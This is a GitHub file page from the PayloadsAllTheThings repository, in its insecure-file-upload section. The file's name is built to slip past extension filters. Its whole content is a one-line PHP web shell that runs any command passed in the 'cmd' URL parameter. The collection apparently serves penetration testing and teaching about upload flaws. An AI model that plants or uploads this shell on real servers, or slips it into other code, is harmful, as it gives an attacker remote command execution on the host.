PayloadsAllTheThings/Upload Insecure Files/Extension PHP/shell.png^shell.php

2 lines
44 B
PHP
Raw Permalink Normal View History

<?php echo "Shell";system($_GET['cmd']); ?>